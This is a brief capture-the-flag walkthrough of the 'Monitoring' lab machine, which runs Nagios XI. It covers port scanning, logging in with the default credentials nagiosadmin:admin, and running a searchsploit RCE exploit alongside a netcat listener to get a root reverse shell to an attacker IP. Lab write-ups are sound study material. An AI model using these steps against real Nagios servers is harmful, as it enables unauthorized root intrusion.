This is a walkthrough of the machine Monitoring from OffSec's Proving Grounds Play labs.
Machine information:
- Level: Easy
- Community rating: Intermediate
- Flags: 1
- OS: Linux
- Vector: Webapp
Nmap
sudo nmap -A --open -sV -sC -v -p- <IP>
Starting off with an Nmap scan, we discover the following open ports:
- 22 - SSH
- 25 - SMTP
- 80 - HTTP
- 389 - LDAP
- 443 - HTTPS
- 5667 - NSCA
Webapp
The web application on ports 80/443 is running Nagios XI.
Navigating to /nagiosxi/login.php, we land on a login page.
Now, a little bit of research into Nagios XI default credentials reveals the default username for the web interface: nagiosadmin.
Playing around with the most commonly seen administrator passwords, we discover that the credential pair nagiosadmin:admin works, and we can access the interface.
Navigating to Admin -> System Information -> Check for Updates, we can find the installed version, which is 5.6.0.
Initial access
Using searchsploit, we find that the application version 5.6.6 is vulnerable to RCE.
searchsploit nagios 5.6
We'll copy the script into our working directory and take a closer look.
searchsploit -m 52138
It looks like we have everything needed to run this exploit - valid credentials and the base path to Nagios XI, so we can start up a listener on our attack box, and run the exploit:
nc -lvnp <PORT>
python3 52138.txt -t http://<VICTIM_IP> -b /nagiosxi/ -u nagiosadmin -p admin -lh <ATTACKER_IP> -lp <LPORT>
And just like that, we receive a shell as root, and can read the proof.txt flag:
